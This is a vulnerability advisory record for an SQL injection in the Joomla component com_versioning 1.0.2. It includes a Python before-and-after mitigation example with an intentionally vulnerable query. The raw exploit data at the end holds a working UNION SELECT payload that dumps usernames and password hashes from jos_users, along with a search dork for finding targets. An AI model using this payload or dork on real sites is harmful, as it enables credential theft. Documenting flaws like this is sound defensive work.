Vendor: Versioning
By: SpK & His0k4
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Versioning
Affected Version From: 1.0.2
Affected Version To: 1.0.2
Patch Exists: YES
Related CWE: N/A
CPE: a:joomprod:versioning
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Joomla Component com_versioning (id) Remote Sql Injection Vulnerability

A vulnerability in the Joomla component com_versioning allows an attacker to inject arbitrary SQL through the 'id' parameter of an 'index.php?option=com_versioning&task=edit&id=' request and so manipulate the SQL queries the component runs. The vulnerability is confirmed in version 1.0.2. Other versions may also be affected.

Mitigation:

Input validation should be applied to the 'id' parameter before it reaches a SQL query, to prevent SQL injection attacks.
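
The mitigation above, as an added example that is not the component's own code: a query built by string concatenation beside a version that validates 'id' as an integer and binds it as a parameter. The SQLite in-memory database, the jos_versioning table and its columns, the function names and the sample values are all assumptions constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the Joomla tables (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE jos_versioning (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE jos_users (username TEXT, password TEXT);
        INSERT INTO jos_versioning VALUES (1, 'first revision');
        INSERT INTO jos_users VALUES ('admin', 'constructed-hash');
    """)
    return db

def edit_vulnerable(db, raw_id):
    # 'Before': the request value is pasted into the SQL text, so anything
    # that follows the number is parsed as SQL.
    sql = "SELECT id, title FROM jos_versioning WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def parse_id(raw_id):
    # Input validation: accept only a plain non-negative decimal integer.
    # isascii() excludes Unicode digits that isdigit() alone would accept.
    if not isinstance(raw_id, str) or not raw_id.isascii() or not raw_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    return int(raw_id)

def edit_hardened(db, raw_id):
    # 'After': validate first, then bind the value as a parameter so it is
    # only ever treated as data, never as SQL text.
    row_id = parse_id(raw_id)
    return db.execute(
        "SELECT id, title FROM jos_versioning WHERE id = ?", (row_id,)
    ).fetchall()

# Constructed input with the same shape as the request in the advisory.
SAMPLE_BAD_ID = "-1 UNION SELECT username, password FROM jos_users"

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", edit_vulnerable(db, SAMPLE_BAD_ID))  # user rows leak
    print("hardened, valid id:", edit_hardened(db, "1"))
    try:
        edit_hardened(db, SAMPLE_BAD_ID)
    except ValueError as exc:
        print("hardened, bad id rejected:", exc)
```

Validation and parameter binding are applied together here: the integer check rejects malformed requests early, and the bound parameter keeps the query safe even if the check is later loosened.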

Exploit-DB raw data:

[+] Name    : Joomla Component com_versioning (id) Remote Sql Injection Vulnerability

[+] Team           : DarkMatter Crew

[+] Crew website       : WwW.SykoPainKilla.CoM

[+] Author         : SpK & His0k4

[+] Contact        : fatal.1.ty[at]hotmail.com[dot]com

[+] D0rk      : inurl:index.php?option=com_versioning



[+] Expl0iT :

http://sykopainkilla.com/index.php?option=com_versioning&task=edit&id=-83 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM jos_users--




side note:
<name>versioning</name>
<creationDate>11.14.2006</creationDate>
<author>Thomas Papin</author>
<copyright>
This component is released under the GNU/GPL License.
</copyright>
<authorEmail>thomas.papin@free.fr</authorEmail>
<authorUrl>www.joomprod.com</authorUrl>
<version>1.0.2</version>

# milw0rm.com [2008-07-01]